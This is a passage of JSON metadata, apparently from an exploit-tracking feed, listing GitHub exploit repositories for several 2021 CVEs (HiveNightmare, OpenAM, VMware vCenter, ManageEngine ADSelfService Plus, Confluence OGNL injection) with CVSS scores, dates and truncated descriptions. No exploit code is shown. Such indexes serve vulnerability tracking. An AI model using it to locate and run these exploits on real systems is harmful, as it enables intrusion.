"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T00:31:11", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], 
"modified": "2021-12-31T15:22:31", "id": "5D86E24D-31EE-5EFA-9D3D-FDD9090FFDEE", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T07:32:45", "description": "# openam CVE-2021-35464\ntomcat \u6267\u884c\u547d\u4ee4\u56de\u663e.\n\n\u9879\u76ee\u57fa\u4e8e [ysoserial](https:/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T03:51:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Forgerock Am", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2022-07-12T07:10:41", "id": "2D7B9CB1-3FDE-5B73-A600-18F0A50BAD80", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:57", "description": "\ufffd\ufffd#\u0000 \u0000C\u0000V\u0000E\u0000-\u00002\u00000\u00002\u00001\u0000-\u00003\u00006\u00009\u00003\u00004\u0000\r\u0000\n\u0000\r\u0000\n\u0000#\u0000#\u0000 \u0000U\u0000s\u0000a\u0000g\u0000e\u0000\r\u0000\n\u0000\r\u0000...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T17:24:44", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-25T06:37:22", "id": "F1AD9ED7-3058-5CFE-81D5-BCB3AF0861B3", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:52:49", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell Fix\n\nThis powershell ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:24:24", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": 
"MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T06:47:23", "id": "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:01:35", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": 
"AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-28T20:31:25", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:10", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell scripts\n\n* Detection....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T21:54:45", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-28T01:48:39", "id": "27CF7C36-9804-5585-80B1-749949BF7AD5", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-27T08:42:24", "description": "# ShadowSteal | CVE-2021-36934\nPure Nim implementation for explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T22:16:49", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-27T07:12:59", "id": "82FD6A90-EA27-5350-98A4-491B6CA140ED", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:52", "description": "# Oxide Hive\nAn exploit for the HiveNightmare/SeriousSAM vulnera...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:01:21", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-05-01T09:47:57", "id": "4FD5C1B6-357A-5C95-AE75-CF79BDD32592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:54:50", "description": "# CVE-2021-36934\n\nC# implementation of [C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-24T12:55:05", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-08-13T21:20:25", "id": "D76E0403-C1B5-59A1-A7E5-B8D3BE2E636D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:28", "description": "# CVE-2021-36934\n about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T23:14:01", "type": "githubexploit", "title": "Exploit for Path Traversal in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-11-09T18:14:11", "id": "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:59:39", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-17T02:51:40", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T16:02:02", "id": "20869A6E-1505-5A22-A2AB-A712FA03D363", "href": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:00:24", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Use of Incorrectly-Resolved Name or Reference in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2023-11-24T20:19:46", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:55:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:20:19", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "69FAE88E-7F22-5ACC-B555-3441BE00C566", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:42:26", "description": "# 
